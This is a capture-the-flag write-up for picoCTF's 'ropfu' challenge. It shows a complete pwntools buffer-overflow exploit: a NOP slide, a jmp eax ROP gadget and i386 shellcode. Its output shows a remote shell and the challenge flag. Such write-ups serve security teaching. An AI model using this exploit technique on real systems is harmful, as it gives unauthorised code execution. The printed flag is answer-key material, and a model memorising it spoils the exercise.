Skip to content

ropfu

The hint and the source code clearly indicate towards ROP to get a shell

  1. Get position of return address of vuln() from the input buffer

    • gdb ./vuln -> disas main -> vuln() ideally returns at 0x08049e1a
    • disas vuln -> set a breakpoint just after gets()
    • run -> give 10-15 a's as input -> at breakpoint, x/100xg $ebp-200
    • return address spotted 28 bytes from the input

  2. checksec ./vuln -> Arch: i386-32-little, Stack: Executable

    • Can inject shellcode which to spawn shell, but the bytecode is too long for 28 bytes; can use NOP slide and a jump over address
    • Find jmp eax gadget (rip jumps to eax, which stores the buffer, which will contain shellcode) -> ROPgadget --binary ./vuln --only "jmp|eax"

  3. use pwntools to construct and send the payload:

    ```python from pwn import *

    p = process('./vuln')

    p = remote('saturn.picoctf.net', 61390) p.recvline() offset = 28 jmpshort = b'\xeb\x04' # jump over the address nop = b'\x90' jmpeax = 0x0805333b shellcode = asm(shellcraft.i386.linux.sh())

    payload = nop*(offset-len(jmpshort)) + jmpshort + p32(jmpeax) + shellcode p.sendline(payload) p.interactive() ```

    shell [+] Opening connection to saturn.picoctf.net on port 61390: Done [*] Switching to interactive mode $ ls flag.txt vuln $ cat flag.txt picoCTF{5n47ch_7h3_5h311_4cbbb771}$